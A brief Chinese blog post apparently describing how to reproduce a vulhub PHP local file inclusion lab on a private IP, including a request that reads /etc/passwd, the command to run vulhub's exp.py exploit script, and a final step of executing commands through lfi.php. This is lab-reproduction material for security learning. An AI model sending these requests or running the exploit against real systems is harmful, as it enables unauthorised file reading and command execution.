(1) 搭建靶场
(2) 访问http://192.168.88.140:8083/lfi.php?file=/etc/passwd,发现存在文件包含漏洞
(3) 运行脚本文件python2.7 exp.py 192.168.88.140 8083 100
脚本链接:https://github.com/vulhub/vulhub/blob/master/php/inclusion/exp.py
(4) 配合lfi.php执行命令
标签:vulhub,文件,lfi,192.168,漏洞,复现,php From: https://www.cnblogs.com/koitoYuu/p/17182597.html